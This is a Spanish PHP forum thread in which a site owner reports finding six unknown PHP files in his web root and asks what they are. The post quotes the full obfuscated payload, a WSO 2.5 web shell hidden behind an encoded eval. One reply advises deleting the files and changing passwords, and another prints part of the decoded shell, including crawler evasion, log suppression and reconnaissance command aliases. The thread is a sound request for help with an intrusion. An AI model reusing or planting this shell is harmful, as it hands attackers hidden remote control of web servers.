Foros del Web » Programando para Internet » PHP »

Informacion creo bug y backdoor..

Estas en el tema de Informacion creo bug y backdoor.. en el foro de PHP en Foros del Web. Hola a todos hoy como frequentemente hago, estaba en mi trabajo abriendo codeanywhere ( una web que permite programar estes donde estes ) y me ...
  #1 (permalink)  
Antiguo 08/03/2012, 08:08
 
Fecha de Ingreso: mayo-2004
Mensajes: 102
Antigüedad: 20 años
Puntos: 5
Informacion creo bug y backdoor..

Hola a todos hoy como frequentemente hago, estaba en mi trabajo abriendo codeanywhere ( una web que permite programar estes donde estes ) y me encontre con unos archivos nuevos en el root de mi web exactamente 6 files nuevos php que son todos del siguiente formato:

w10225056w.php
w10225057w.php
etc....

con el siguiente contenido:

Código PHP:
<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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'\x29\x29\x29\x3B",".");?>
Alguien sabe que es esto?Intrusos?
Espero vuestras opiniones,
Saludos GRACIAS!
__________________
Bruno Quintana
  #2 (permalink)  
Antiguo 15/03/2012, 04:44
Avatar de repara2  
Fecha de Ingreso: septiembre-2010
Ubicación: München
Mensajes: 2.445
Antigüedad: 13 años, 7 meses
Puntos: 331
Respuesta: Informacion creo bug y backdoor..

Hola bruno911, sea lo que sea, si tú no has creado los archivos boŕralos. Como medida de seguridad adicional cambia las contraseñas ftp, web, etc... Implementar seguridad en el código es más complejo pero empieza por filtrar $_GET y $_POST, no uses $_REQUEST y regenera los id de session cada vez que sea posible.
Saludos
__________________
Fere libenter homines, id quod volunt, credunt.
  #3 (permalink)  
Antiguo 15/03/2012, 05:34
Avatar de hasdpk  
Fecha de Ingreso: agosto-2011
Ubicación: $spain->city( 'Arucas' );
Mensajes: 1.800
Antigüedad: 12 años, 8 meses
Puntos: 297
Respuesta: Informacion creo bug y backdoor..

Seguramente sea de algún trojano o algo parecido, esa línea contiene este código:

Código PHP:
Ver original
  1. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  2.  
  3.     $userAgents = array("Google",
  4.                         "Slurp",
  5.                         "MSNBot",
  6.                         "ia_archiver",
  7.                         "Yandex",
  8.                         "Rambler");
  9.                        
  10.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  11.    
  12.         header('HTTP/1.0 404 Not Found');
  13.         exit;
  14.  
  15.     }
  16.  
  17. }
  18.  
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @define('WSO_VERSION', '2.5');
  23.  
  24.  
  25.     function WSOstripslashes($array) {
  26.  
  27.         return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  28.  
  29.     }
  30.  
  31.     $_POST = WSOstripslashes($_POST);
  32.     $_COOKIE = WSOstripslashes($_COOKIE);
  33.  
  34. }
  35.  
  36. function wsoLogin() {
  37.  
  38.     die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
  39.    
  40. }
  41.  
  42. function WSOsetcookie($k, $v) {
  43.  
  44.     $_COOKIE[$k] = $v;
  45.     setcookie($k, $v);
  46.  
  47. }
  48.  
  49. if(!empty($auth_pass)) {
  50.  
  51.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  52.         WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  53.        
  54.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  55.         wsoLogin();
  56.  
  57. }
  58.  
  59. if(strtolower(substr(PHP_OS,0,3)) == "win")
  60.     $os = 'win';
  61. else
  62.     $os = 'nix';   
  63.     $safe_mode = @ini_get('safe_mode');
  64.  
  65. if(!$safe_mode)
  66.     error_reporting(0);
  67.     $disable_functions = @ini_get('disable_functions');
  68.     $home_cwd = @getcwd();
  69.    
  70. if(isset($_POST['c']))
  71.     @chdir($_POST['c']);
  72.     $cwd = @getcwd();
  73.    
  74. if($os == 'win') {
  75.     $home_cwd = str_replace("\\", "/", $home_cwd);
  76.     $cwd = str_replace("\\", "/", $cwd);
  77.     }
  78.    
  79. if($cwd[strlen($cwd)-1] != '/')
  80.     $cwd .= '/';
  81.    
  82. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  83.     $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
  84.    
  85. if($os == 'win')
  86.     $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
  87. else
  88.     $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -v

Etiquetas: bug, informacion
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 15:49.